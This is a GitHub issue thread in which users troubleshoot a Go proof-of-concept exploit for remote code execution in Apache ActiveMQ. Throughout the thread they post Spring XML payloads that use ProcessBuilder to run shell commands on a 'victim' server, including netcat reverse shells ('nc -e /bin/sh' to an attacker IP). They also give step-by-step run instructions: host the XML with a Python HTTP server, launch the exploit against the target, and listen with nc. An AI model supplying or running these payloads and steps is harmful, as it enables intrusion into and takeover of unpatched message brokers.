No output
mhammadkassem opened this issue · 28 comments
Hello,
I am using kali, and I run a server on port 5555, and then I tried to run your code using the command below:
/ActiveMQ-RCE -i [victim IP] -u http://[kali server IP]:5555/poc.xml
and in the poc.xml I wrote the following:
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="
http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg >
<list>
<value>sh/value>
<value>-c</value>
<value>echo 'Hello, World!' > hello.txt</value>
</list>
</constructor-arg>
</bean>
</beans>
I run the command then nothing happens, am I doing something wrong?
To notet that on victim server I confirmed that port 61616 is running.
Yes, I got this problem also,
First, there is a typo in your xml: <value>sh/value> should be <value>sh</value>
Second, It is a xml file, which means the char > will be parsed as an xml tag, so echo 'Hello, World!' > hello.txt will finally lead to a syntax error.
You can refer to: https://r0yanx.com/tools/java_exec_encode/
It worked no, it connects to my server, but I adjusted the xml file to only create a file called hello.txt on the server, but I couldn't find the file, however I was wonderting why do we need to add a poc.xml file when we can open a reverse shell? I mean since the victim server is connecting to my server, do we still need a poc.xml? or we can just let the server connect and get a reverse shell?
this is my xml file:
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="
http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg >
<list>
<value>sh</value>
<value>-c</value>
<value>touch hello.txt</value>
</list>
</constructor-arg>
</bean>
</beans>
So the point is that the victim server is connecting to my server, but the poc.xml is not doing anything. Can you please clarify what is the role of the poc.xml file ? becuase without it the victim is initiaing a connection to my server, which is an issue in itself.
Okay so I tried to run a listener on my machine nc -lvp 6666 .
and I updated the poc.xml file as follows:
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="
http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg >
<list>
<value>sh</value>
<value>-c</value>
<value>nc -e /bin/sh 10.20.20.20 6666</value>
</list>
</constructor-arg>
</bean>
</beans>
where 10.20.20.20 is the ip of my server.
I also run a simple http server on 5555 .
All i see is the connection to 5555, but I never get a reverse shell .
Am I doing something wrong ?
Hi @mhammadkassem, I saw you try to revershell method via xml. So, did you run the calculator app or other basic app sth. Because, I cannot see calculator app on the screen when I tried to send request with xml file. So, Can you share details how did you do it, if you have.
hello @markdown0 ,
No I was not able to get a reverseshell, I was trying to but I couldn't.
I tried in the xml file several things but not of them worked.
What I tried:
- creating simple hello.txt file
- reverseshell
All of these did not work, but the wierd thing is that the server connects to my http listening port.
Yes, I stuck the same area, also. It doesn't work
@markdown0 is it connecting to your http listening port ?
yes, I can see all of connection on browser but running app doesn't seem suitable for now. You can see my problem in other topic: #3
@mhammadkassem I did it bro, you can use shared xml code, it works on me:
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="
http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>sh</value>
<value>-c</value>
<value>nc -e /bin/sh 'IP' 444 </value>
</list>
and after the go build & run process, you can use nc -lvnp 4444 listening process:
./main -i 'target ip' -u http://127.0.0.1:8001/poc-linux.xml
nc -lvnp 4444
</constructor-arg>
</bean>
</beans>
hello @markdown0 ,
The xml code you attached seems mixing with your comment, can you please correct it ? And why this xml code worked? what was the issue ?
@markdown0
I just noticed that the xml you used is the same as the one I attached no ?
Hello @X1r0z,
Can you please help me understand how the xml file is consumed by activemq and how it will then run the shell commands ?
I need to understand that to know why in my case the xml file is not consumed and the shell commands are not run.
Thanks in advance!
@mhammadkassem,
To understand clearly, you can use Wireshark if your process runs correctly. I have tested it on kali and it works. My tested version of ActiveMQ is 5.18.0. Maybe you can try other go file in other repos. Because my code work in my github repo:
https://github.com/FerdiGul/POC/tree/main/CVE-2023-26604
Can you please share the step by step of your test ?
IN my case I have active-mq (this is the version running apache-activemq-5.7.0) , and it is listening on port 61616.
When I run the activemq-rce from my kali machine which is running an http server on port 5555, I see that the victim server does a GET request to the poc.xml , but then nothing happen afterwads. ( I also have a listening on port on 6666 for reverseshell)
@mhammadkassem, You can check all of steps as I share:
Ready to environment:
- Download Active MQ 18.0.0 Release fromhere:
https://activemq.apache.org/activemq-5018000-release
2.Install the Active MQ based on instructions, you can use it:
https://www.techbeginner.in/2019/12/how-to-install-apache-activemq-on-ubuntu-16-04.html
- Tested on Kali (Debian) current distribution.
Build POC:
-
$ python3 -m http.server 8001 (where the .xml poc file)
-
$ sudo go build main.go (build & run go file)
-
$ sudo run main.go
-
$ systemctl status activemq (Check the Activemq service is up)
-
Check the values tags on xml file as:
<value>sh</value> <value>-c</value> <value>nc -e /bin/sh <target_ip> 4444</value> -
Check the default values. You don't need to review it:
flag.StringVar(&ip, "i", "", "ActiveMQ Server IP or Host")
flag.StringVar(&port, "p", "61616", "ActiveMQ Server Port")
flag.StringVar(&url, "u", "", "Spring XML Url")
flag.Parse()
Run POC:
- $ ./main -i <target_ip> -u http://127.0.0.1:8001/poc-linux.xml
- $ nc -lvnp 4444 (listening for reverse shell)
@FerdiGul its weird, I did exactly the same, but nothing happens.
Maybe you need to try chmod +x command for poc directory where the all of files, also. And you can check, is your activemq server is running via web browser and systemctl status. (http://127.0.0.1:8161/index.html)
@FerdiGul , btw is it supposed to find the poc.xml file on the victim server? because after running the poc, eventhough I see that the victim server did GET request on the poc.xml, I still can't find the poc.xml file on the civtim server.
@FerdiGul, where should I launch the chmod ? on the vicitm server ?
@mhammadkassem I think, you can try it on your local firstly and when you check it runs correctly so you can try to remote server but you know chmod +x to give high privileges for poc directory files.
@FerdiGul, the remote server is doing GET poc.xml, but I need to know if I should see the file on the remote server (aka victim server) or not? because there is no poc.xml file downloaded even though it connects to my server. it is very weird :/ .
@X1r0z any idea what could be the issue ?
I need to understand how the xml file will be consumed by the server becuase it seems it is never executed.
@mhammadkassem I did it bro, you can use shared xml code, it works on me:
<?xml version="1.0" encoding="UTF-8" ?> <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> <constructor-arg> <list> <value>sh</value> <value>-c</value> <value>nc -e /bin/sh 'IP' 444 </value> </list> and after the go build & run process, you can use nc -lvnp 4444 listening process: ./main -i 'target ip' -u http://127.0.0.1:8001/poc-linux.xml nc -lvnp 4444 </constructor-arg> </bean> </beans>
Hello @markdown0 ,
In your case when you run the command, can you please confirm if you get the poc.xml file on the victim server ?
Hello @X1r0z , is activemq 5.7.0 version vulnerable to this ?
@mhammadkassem poc.xml don't need to be on victim server. Because, you use the http.server to get file from source ip (localhost in case) to victim address.